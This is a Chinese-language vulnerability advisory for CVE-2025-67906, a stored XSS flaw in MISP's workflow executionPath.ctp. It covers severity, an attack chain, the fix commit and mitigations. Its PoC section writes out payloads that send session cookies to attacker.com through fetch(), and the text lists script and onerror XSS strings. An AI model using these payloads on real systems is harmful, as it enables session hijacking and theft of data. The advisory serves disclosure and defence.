CVE-2025-67906 MISP Workflow executionPath.ctp跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2025-67906

漏洞类型

XSS跨站脚本攻击

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

MISP

漏洞概述

CVE-2025-67906是MISP（Malware Information Sharing Platform）中的一个中等严重性跨站脚本（XSS）漏洞。该漏洞存在于MISP 2.5.28之前的版本中，具体位于app/View/Elements/Workflows/executionPath.ctp文件。由于该文件在处理工作流执行路径时未对用户输入进行充分的输出编码或过滤，攻击者可以通过在workflow execution path中注入恶意JavaScript代码。当其他用户查看包含恶意脚本的工作流执行路径时，攻击者的脚本将在受害者浏览器中执行，可能导致会话劫持、敏感信息窃取或对页面内容进行篡改等安全问题。CVSS 3.1评分5.4（中等），攻击复杂度低，需要低权限用户参与，但无需特殊权限即可利用。

技术细节

漏洞根源在于MISP的工作流执行路径展示功能（executionPath.ctp）中存在存储型XSS。攻击者利用工作流功能创建包含恶意JavaScript payload的工作流，当该工作流被执行或查看时，存储在数据库中的恶意代码未经适当转义即被输出到HTML页面中。攻击者可构造如下payload：<script>alert(document.cookie)</script>或使用事件处理器如<img src=x onerror=alert(1)>等。由于MISP是安全情报共享平台，用户之间会频繁共享和分析工作流，这大大增加了漏洞的利用面和影响范围。修复方案已在commit 1f39deb572da7ecb5855e30ff3cc8cbcaa0c1054中实现，版本v2.5.28已包含修复。

攻击链分析

STEP 1

步骤1：侦察与访问

攻击者获取MISP系统访问权限（低权限账户即可），识别目标系统中存在的工作流功能模块

STEP 2

步骤2：恶意负载构造

攻击者构造XSS payload，如<script>alert(document.cookie)</script>或利用HTML事件处理器<img src=x onerror=...>

STEP 3

步骤3：注入恶意代码

攻击者在创建或编辑工作流时，将恶意payload注入到executionPath字段中，payload被存储到数据库

STEP 4

步骤4：触发漏洞

当其他用户（管理员或普通用户）查看该工作流的执行路径时，未经过滤的恶意代码被输出到HTML页面

STEP 5

步骤5：执行恶意脚本

受害者浏览器执行注入的JavaScript代码，导致会话cookie窃取、会话劫持或敏感信息泄露

STEP 6

步骤6：权限提升与横向移动

攻击者利用窃取的会话凭证执行未授权操作，可能窃取更多敏感情报数据或扩大攻击范围

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-67906 PoC - Stored XSS in MISP Workflow executionPath
// This PoC demonstrates the XSS vulnerability in MISP before 2.5.28
// Target: MISP instance < 2.5.28

// Step 1: Create a malicious workflow with XSS payload
const payload = '<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>';

// Step 2: Inject payload into workflow execution path field
// The payload will be stored and executed when viewed by other users

// Alternative payload using event handler:
const altPayload = '<img src=x onerror="fetch(\'https://attacker.com/log?data=\'+btoa(document.cookie))">';

// Attack flow:
// 1. Attacker with low privileges creates/edits workflow
// 2. In execution path field, inject malicious JavaScript
// 3. When other users view the workflow, XSS executes in their browser
// 4. Attacker steals session cookies or performs actions on behalf of victim

影响范围

MISP < 2.5.28

防御指南

临时缓解措施

立即将MISP升级到2.5.28版本以获取官方修复。临时缓解措施包括：1）禁用不必要的工作流功能；2）限制用户创建和编辑工作流的权限；3）在Web服务器层面配置XSS防护头（如X-XSS-Protection）；4）监控和分析MISP访问日志，检测异常的JavaScript代码注入行为；5）考虑使用WAF规则阻止包含<script>标签和事件处理器属性的请求。